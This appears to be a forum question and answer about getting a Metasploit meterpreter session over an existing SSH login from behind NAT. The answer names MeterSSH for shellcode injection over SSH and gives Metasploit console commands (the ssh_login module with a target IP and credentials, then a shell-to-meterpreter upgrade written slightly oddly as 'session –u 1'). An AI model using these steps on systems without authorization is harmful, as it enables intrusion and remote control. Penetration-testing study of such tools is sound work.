I'm behind NAT.
I can log in over ssh to the target.
How to use metasploit / Send meterpreter over that SSH connection?
I tried shell_to_meterpreter but it failed because I can't open my port for reverse TCP to connect to.
Both machines are on linux.
Windows:
You can try using MeterSSH.
MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file.
Linux:
You can use the auxiliary module of metasploit called ssh_login:
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username foo
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit
Now convert command shell into meterpreter shell through following command
session –u 1
